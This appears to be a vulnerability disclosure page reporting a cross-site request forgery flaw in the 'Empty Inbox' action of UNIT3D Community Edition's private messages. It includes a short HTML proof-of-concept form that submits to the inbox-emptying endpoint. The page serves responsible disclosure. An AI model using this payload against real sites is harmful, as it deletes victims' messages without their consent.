Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Valid
Reported on
Oct 9th 2021
Description
There is a CSRF vulnerability on Empty Inbox in Private Messages inbox.
Proof of Concept
//POC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://unit3d.site/mail/empty-inbox">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Occurrences
We have contacted a member of the
hdinnovations/unit3d-community-edition
team and are waiting to hear back
a year ago
inbox.blade.php#L39
has been validated
to join this conversation